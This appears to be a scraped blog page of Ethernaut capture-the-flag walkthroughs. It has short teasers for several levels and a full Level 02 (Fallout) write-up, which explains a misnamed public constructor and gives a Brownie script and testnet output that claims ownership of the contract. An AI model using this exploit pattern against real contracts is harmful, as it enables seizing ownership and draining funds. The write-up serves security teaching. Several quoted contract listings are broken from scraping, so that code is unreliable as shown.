
Ethernaut - Level 07 - Force

Image courtesy of OpenZeppelin Ethernaut 07 - Force This level from Ethernaut, Force, provides us with an empty smart contract containing only some ASCII-art. The goal here is to send some ether to the contract using the selfdestruct() instruction. # Level 07 - Force ### Source Code // SPDX-License-Identifier: MIT pragma solidity ^0.6.0; contract Force {/* MEOW ? /\\_/\\ / ____/ o o \\ /~____ =ø= / (______)__m_m) */} Before explaining why this smart contract is vulnerable, let’s get familiarized with the function selfdestruct().

Ethernaut - Level 06 - Delegation

Image courtesy of OpenZeppelin Ethernaut 06 - Delegation This level from Ethernaut, Delegation, is about a special Solidity method called delegatecall(). To complete this level, we must understand how this low level function works, how it can be used to delegate operations to on-chain libraries, and what implications it has on execution scope. // SPDX-License-Identifier: MIT pragma solidity ^0.6.0; contract Delegate { address public owner; constructor(address _owner) public { owner = _owner; } function pwn() public { owner = msg.

Ethernaut - Level 05 - Token

Image courtesy of OpenZeppelin Ethernaut 05 - Token This level from Ethernaut, called Token, is a good exercise to become familiar with the integer underflow and integer overflow concepts. In this challenge you are given 20 tokens to start with and you will beat the level if you somehow manage to get your hands on any additional tokens. Preferably a very large number of tokens. // SPDX-License-Identifier: MIT pragma solidity ^0.

Ethernaut - Level 04 - Telephone

Image courtesy of OpenZeppelin Ethernaut 04 - Telephone This level from Ethernaut, called Telephone, is a good exercise to learn the nuances between tx.origin and msg.sender and why you should never use tx.origin for authentication purposes: // SPDX-License-Identifier: MIT pragma solidity ^0.6.0; contract Telephone { address public owner; constructor() public { owner = msg.sender; } function changeOwner(address _owner) public { if (tx.origin != msg.sender) { owner = _owner; } } } Solidity has a global variable, tx.

Ethernaut - Level 03 - Coinflip

Image courtesy of OpenZeppelin Ethernaut 03 - Coinflip The third level in Ethernaut, CoinFlip, is a good exercise that will teach you how to exploit pseudo randomness implementations in smart contracts. This contract will require you to correctly guess the outcome of a coin flip ten times in a row: // SPDX-License-Identifier: MIT pragma solidity ^0.6.0; import '@openzeppelin/contracts/math/SafeMath.sol'; contract CoinFlip { using SafeMath for uint256; uint256 public consecutiveWins; uint256 lastHash; uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968; constructor() public { consecutiveWins = 0; } function flip(bool _guess) public returns (bool) { uint256 blockValue = uint256(blockhash(block.

Ethernaut Challenges

Please read This is a work in progress article that will receive updates as we continue publishing detailed walkthroughs for each level. Ethernaut is OpenZeppelin Web3/Solidity based wargame to learn about Ethereum smart contract security and become familiar with programming principles in Solidity. Although the game was launched few years ago it has become a good place to start for those who are interested on security and smart contracts. Challenges are currently running on the Rinkeby testnet and you will require to use a Rinkey Faucet to get free testnet ETH and test the smart contracts.

Ethernaut - Level 01 - Fallback

Image courtesy of OpenZeppelin Ethernaut 01 - Fallback The first level from Ethernaut is pretty straightforward and we will use it to become familiar with some Solidity concepts and the Brownie framework that we will use to complete this challenge. The code for the smart contract that we must exploit is shown above: // SPDX-License-Identifier: MIT pragma solidity ^0.6.0; import '@openzeppelin/contracts/math/SafeMath.sol'; contract Fallback { using SafeMath for uint256; mapping(address => uint) public contributions; address payable public owner; constructor() public { owner = msg.

Ethernaut - Level 02 - Fallout

Image courtesy of OpenZeppelin Ethernaut 02 - Fallout The goal for this level is to claim ownership of the contract, which has the following implementation: // SPDX-License-Identifier: MIT pragma solidity ^0.6.0; import '@openzeppelin/contracts/math/SafeMath.sol'; contract Fallout { using SafeMath for uint256; mapping (address => uint) allocations; address payable public owner; /* constructor */ function Fal1out() public payable { owner = msg.sender; allocations[owner] = msg.value; } modifier onlyOwner { require( msg.sender == owner, "caller is not the owner" ); _; } function allocate() public payable { allocations[msg.

Ethernaut - Level 02 - Fallout

August 2, 2022

Image courtesy of OpenZeppelin

Image courtesy of OpenZeppelin

Ethernaut 02 - Fallout

The goal for this level is to claim ownership of the contract, which has the following implementation:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import '@openzeppelin/contracts/math/SafeMath.sol';

contract Fallout {
  using SafeMath for uint256;
  mapping (address => uint) allocations;
  address payable public owner;

  /* constructor */
  function Fal1out() public payable {
    owner = msg.sender;
    allocations[owner] = msg.value;

  modifier onlyOwner {
	            msg.sender == owner,
	            "caller is not the owner"

  function allocate() public payable {
    allocations[msg.sender] = allocations[msg.sender].add(msg.value);

  function sendAllocation(address payable allocator) public {
    require(allocations[allocator] > 0);

  function collectAllocations() public onlyOwner {

  function allocatorBalance(address allocator) public view returns (uint) {
    return allocations[allocator];

Contrarily to the previous level, this one is really simple and will teach us about constructors and the public modifier in Solidity.

Ethernaut challenges recreate issues that may no longer exist in recent versions of Solidity, but still are a good exercise on how to securely code smart contracts.

Up to Solidity 0.4.21, constructors could be defined using the same name of its contract name, although this could cause unintended bugs when contracts were renamed and their constructors were not.

Precisely to avoid this behavior Solidity introduced the constructor keyword. Which according to Solidity’s documentation, constructors are caracterized for:

  • Being optional functions which are executed upon contract creation, and can be used to run contract initialisation code
  • Before the constructor code is executed, state variables are initialised to their specified value (inline), or their default value.
  • If there is no constructor, the contract will assume thhe default constructor, equivalent to constructor() {}.

Additionally, Solidity has four types of visibility for functions:

  • external – Part of the contract interface, and therefore can be called from other contracts and via transactions, with the unusual characteristic that external functions cannot be called internally.
  • public – Also part of the contract interface, can be called internally or via message calls
  • internal – Can only be accessed from within the current contract or contracts deriving from it. They cannot be accessed externally.
  • private – Functions are not visible in derived contracts.

Understanding these concepts will help us complete this challenge.

Where is the vulnerability?

One particular thing that should get our attention is the contract’s name, and the comment before the Fal1out method declaration:

contract Fallout {
  using SafeMath for uint256;
  mapping (address => uint) allocations;
  address payable public owner;

  /* constructor */
  function Fal1out() public payable {
    owner = msg.sender;
    allocations[owner] = msg.value;

As mentioned before, Solidity versions prior 0.5.0, required a constructor to be called with the same name as the contract, however, the security issue with this contract is that there is a typo and the function that should act as constructor has been named Fal1out, rather than Fallout, and uses the public attribute, meaning, it can be called by anyone.

If we review its code, whoever calls the Fal1out method will become its legitimate owner and therefore will be able to drain its funds.

    owner = msg.sender;
    allocations[owner] = msg.value;

This vulnerability is rare to occur in recent versions of Solidity, since contracts are now forced to use the constructor keyword.

Something as simple as this is what happened with the Rubixi incidence, where the developer renamed the contract’s name from DynamicPyramid to Rubixi, but forgot to rename the constructor function from DynamicPyramid() to Rubixi() and as result attackers could publicly invoke the DynamicPyramic() function and obtain control of the contract, transferring its ethers out.

contract Rubixi {

        //Declare variables for storage critical to contract
        uint private balance = 0;
        uint private collectedFees = 0;
        uint private feePercent = 10;
        uint private pyramidMultiplier = 300;
        uint private payoutOrder = 0;

        address private creator;

        //Sets creator
        function DynamicPyramid() {
                creator = msg.sender;
...omitted for brevity...

See the similarities? Now let’s explain how to exploit this contract!

Hacking the contract

Following our steps from previous level, we will continue using brownie for the exploitation of this contract.

For this particular level we will create a simple interface which require access to the owner() and Fal1out() function, as shown below:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

interface IFallout {
    function owner() external view returns (address payable);
    function Fal1out() external payable;

Our script to attack the contract and drain all the Ethers will be pretty straightforward:

from brownie import accounts, config, interface, web3, Fallout

def attack(target, hacker):
    fallout = interface.IFallout(target)
    fallout.Fal1out({"from": hacker})
    print(f"Owner is hacker: {fallout.owner() == hacker}")

def main(target):
    hacker = accounts.add(config['wallets']['from_key'])
    attack(target, hacker)

In this case we have a main function which receives as parameter the contract’s address that we are aiming to attack, and the attack method, which receives the target and hacker parameters. This method is the one that will claim ownership of the contract right after calling its constructor through the fallout.Fal1out call, as shown below:

root@vmi828562 ~/r/e/fallout-02 [1]# brownie run attack main "0xD48037e289Be89083bE8e58dFC74bd578D6523e3" --network rinkeby
Brownie v1.18.1 - Python development framework for Ethereum

Fallout02Project is the active project.

Running 'scripts/'...
Transaction sent: 0x11be0d3bac8cc87cfa19b8bf03a4ecc7760b441d6ab6d0b5e801a0f436ea9300
  Gas price: 1.16223081 gwei   Gas limit: 50442   Nonce: 21
  Transaction confirmed   Block: 10722650   Gas used: 45767 (90.73%)

Owner is hacker: True


As usual, we like to wrap up each challenge with some recommendations or lessons learnt. In this case I think the most valuable lesson is to learn about what constructors are and how they should be declared.

But it is also a good opportunity to introduce security analysis tools that can help us discover vulnerabilities in our Ethereum smart contract code during its development life cycle.